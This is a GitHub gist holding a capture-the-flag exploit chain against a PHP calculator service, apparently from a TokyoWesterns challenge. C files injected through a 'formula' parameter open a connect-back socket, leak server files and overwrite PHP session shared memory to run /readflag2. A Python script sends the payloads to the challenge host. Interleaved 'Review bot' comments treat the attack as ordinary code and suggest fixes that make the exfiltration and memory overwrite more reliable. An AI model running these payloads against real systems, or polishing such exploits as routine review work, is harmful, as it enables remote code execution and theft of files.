
@icchy
Created September 2, 2019 00:30

Revisions

  1. icchy created this gist Sep 2, 2019.
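--- a/exp.c
+++ b/exp.c
@@ -0,0 +1,70 @@
+123;
+return 123;
+}
+extern void *opendir(const char *);
+extern void *readdir(void *);
+extern void *shmat(int, const void *, int);
+typedef struct {
+ino_t d_ino;
+off_t d_off;
+unsigned short d_reclen;
+unsigned char d_type;
+char d_name[256];
+} dirent;
+struct sockaddr {
+unsigned short int sa_family;
+char sa_data[14];
+};
+struct in_addr {
+uint32_t s_addr;
+};
+struct sockaddr_in {
+unsigned short int sin_family;
+unsigned short sin_port;
+struct in_addr sin_addr;
+char sin_zero[8];
+};
+int sock;
+int data_send(char *data, int len) {
+return send(sock, data, len, 0);
+}
+__attribute__((constructor)) void setup1() {
+int r;
+struct sockaddr_in sa;
+memset(&sa, 0, sizeof(sa));
+sa.sin_family = 2;
+sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */
+sa.sin_port = 0x901f; /* and port */
+sock = socket(2, 1, 0);
+connect(sock, (struct sockaddr*)&sa, sizeof(sa));
+dup2(sock, 1);
+}
+__attribute__((constructor)) void f() {
+void *dir = (void*)opendir("/tmp");
+void *de;
+while (1) {
+de = readdir(dir);
+if (de == NULL) break;
+
+char *s = ((dirent*)de)->d_name;
+if (s[0] == 's' && strlen(s) == 7) {
+char p[256];
+snprintf(p, 255, "/tmp/%s", s);
+int id = shmget(ftok(p, 'a'), 0, 0);
+int i = 0;
+void *data = shmat(id, 0, 0);
+void *var = data+64;
+void *size = var-16;
+char *payload = "__PAYLOAD__";
+if (*((uint64_t*)size) != 26) {
+continue;
+}
+*((uint64_t*)size) = strlen(payload);
+for (i = 0; i < *((uint64_t*)size); i++) {
+((char*)var)[i] = payload[i];
+}
+}
+}
+}
+int g(){
+int res = 0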
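Review bot: The scan in f() dereferences the attached segment at `if (*((uint64_t*)size) != 26)` without checking that `shmget` or `shmat` succeeded, so any /tmp entry matching the `s` + 7-character name heuristic that is not a valid ftok key or segment makes `shmat` return `(void *)-1`, and the read 48 bytes past that value would fault before the remaining directory entries are examined. Guard both results before touching the segment: `if (id < 0) continue;` after the shmget line and `if (data == (void *)-1) continue;` after the shmat line. Segments that fail the length check are never detached either; a `shmdt(data);` before that `continue` keeps the attach count from growing. The overwrite at `*((uint64_t*)size) = strlen(payload)` replaces a string it just verified to be 26 bytes with one that, given the object built in solve.py, is several times longer and is bounded only by the payload itself, so a comment stating why the segment has room (or a `shmctl(id, IPC_STAT, ...)` bound) would make the layout assumption explicit. The `123; return 123; }` at the top closes a function that begins outside this file and `g()` at the bottom is intentionally left open, so neither is reviewable here.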
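--- a/leak.c
+++ b/leak.c
@@ -0,0 +1,49 @@
+123;
+}
+__asm__(".section .rodata\n"
+".global bin_start\n"
+".type bin_start, @object\n"
+".balign 16\n"
+"bin_start:\n"
+".incbin \"__PATH__\"\n"
+".global bin_end\n"
+".type bin_end, @object\n"
+".balign 1\n"
+"bin_end:\n"
+".byte 0\n"
+);
+extern const __attribute__((aligned(16))) void *bin_start;
+extern const void* bin_end;
+struct sockaddr {
+unsigned short int sa_family;
+char sa_data[14];
+};
+struct in_addr {
+uint32_t s_addr;
+};
+struct sockaddr_in {
+unsigned short int sin_family;
+unsigned short sin_port;
+struct in_addr sin_addr;
+char sin_zero[8];
+};
+int sock;
+int data_send(char *data, int len) {
+return send(sock, data, len, 0);
+}
+__attribute__((constructor)) void setup1() {
+int r;
+struct sockaddr_in sa;
+memset(&sa, 0, sizeof(sa));
+sa.sin_family = 2;
+sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */
+sa.sin_port = 0x901f; /* and port */
+sock = socket(2, 1, 0);
+connect(sock, (struct sockaddr*)&sa, sizeof(sa));
+dup2(sock, 1);
+}
+__attribute__((constructor)) void f() {
+printf("%s\n", &bin_start);
+}
+int g(){
+int res = 0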
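Review bot: `printf("%s\n", &bin_start)` in f() stops at the first NUL byte of the embedded file, so the `bin_end` label the assembly block emits (and the file declares with `extern const void* bin_end;`) is never used and any included file containing a NUL, such as a binary, is truncated. Sending the exact span through the already-defined but unused `data_send` also keeps the bytes out of the stdio buffer on the dup2'd socket: `int n = (int)((const char *)&bin_end - (const char *)&bin_start);` followed by `data_send((char *)&bin_start, n);`. Declaring the symbols as `extern const char bin_start[], bin_end[];` would express that they are labels rather than pointer objects and drop the `&`. As in exp.c, the socket(), connect() and dup2() results in setup1() are unchecked, so a failed connect-back silently leaks nothing. The `123; }` at the top closes a function that begins outside this file and `g()` at the bottom is left open on purpose, so neither is reviewable here.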
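--- a/solve.py
+++ b/solve.py
@@ -0,0 +1,44 @@
+import requests
+
+url = 'http://galileo.local:10080/calc.php'
+url = 'http://192.168.121.171:10080/calc.php'
+url = 'http://localhost:10080/calc.php'
+url = 'http://olc.chal.ctf.westerns.tokyo/calc.php'
+# url = 'http://192.168.121.171/calc.php'
+
+def exp():
+payload = open('exp.c', 'rb').read()
+
+cmd = "/readflag2>/var/tmp/0j29fqj30f"
+obj = 'a:2:{s:9:"__started";i:1;i:2;O:4:"Calc":3:{s:3:"bin";s:%d:"";%s;";s:3:"src";s:6:"abcdef";s:3:"tmp";R:4;}}' % (3 + len(cmd), cmd)
+
+obj = obj.replace('{', '\\x7b').replace('}', '\\x7d').replace('"', '\\"')
+payload = payload.replace('__PAYLOAD__', obj)
+payload = payload.replace('{', '<%')
+payload = payload.replace('}', '%>')
+payload = payload.replace('#', '%:')
+payload = payload.replace('\n', ' ')
+
+req = requests.get(url, params={
+'formula': payload
+})
+
+print(req.content)
+
+
+def leak(path):
+payload = open('leak.c', 'rb').read().replace('__PATH__', path)
+payload = payload.replace('{', '<%')
+payload = payload.replace('}', '%>')
+payload = payload.replace('#', '%:')
+payload = payload.replace('\n', ' ')
+
+req = requests.get(url, params={
+'formula': payload
+})
+
+print(req.content)
+
+leak('./calc.php')
+exp()
+leak('/var/tmp/0j29fqj30f')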
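Review bot: `open('exp.c', 'rb').read()` in exp() and the matching line in leak() return bytes, but every following `.replace(...)` passes str arguments, which raises TypeError under Python 3 (`bytes.replace` requires bytes); the script presumably ran under Python 2, where `'rb'` still yields str. Opening the two sources in text mode, `payload = open('exp.c').read()` and `payload = open('leak.c').read().replace('__PATH__', path)`, keeps it working on both. The four consecutive `url = ...` assignments leave only the last one live; keep one and select the target through an argument or environment variable rather than dead assignments. The escaping at `obj = obj.replace('{', '\\x7b')...` has to run before the digraph rewrite of `{`, `}` and `#` over the whole C source, which is not obvious from the code; a comment such as `# escape braces/quotes inside the C string literal first so the digraph rewrite below leaves them alone` would record that ordering. The output path `/var/tmp/0j29fqj30f` is spelled twice, in `cmd` and in the final `leak()` call, and should be a single constant.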